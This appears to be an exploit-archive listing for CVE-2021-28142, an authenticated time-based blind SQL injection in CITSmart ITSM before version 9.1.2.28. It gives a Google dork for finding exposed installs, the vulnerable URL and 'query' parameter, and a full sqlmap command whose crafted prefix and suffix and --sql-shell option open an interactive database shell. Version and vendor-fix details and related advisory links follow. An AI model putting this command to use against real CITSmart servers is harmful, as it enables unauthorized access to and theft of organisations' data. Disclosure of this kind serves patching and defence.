Lucene search
Zdt1337DAY-ID-36100HistoryApr 14, 2021 - 12:00 a.m.
CITSmart ITSM 9.1.2.27 - (query) Time-based Blind SQL Injection (Authenticated) Vulnerability
2021-04-1400:00:00
0day.today
23
0.003 Low
EPSS
Percentile
65.1%
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142
To exploit this flaw it is necessary to be authenticated.
URL vulnerable:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Param vulnerable: query
Sqlmap usage: sqlmap -u "
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell
Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28
Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)
# 0day.today [2021-10-17] #Related
cve
cve
CVE-2021-28142
2021-04-06 15:15:13
prion
prion
Information disclosure
2021-04-06 15:15:00
cvelist
cvelist
CVE-2021-28142
2021-04-06 14:07:23
nvd
nvd
CVE-2021-28142
2021-04-06 15:15:13
packetstorm
packetstorm
CITSmart ITSM 9.1.2.27 SQL Injection
2021-04-14 00:00:00
exploitdb
exploitdb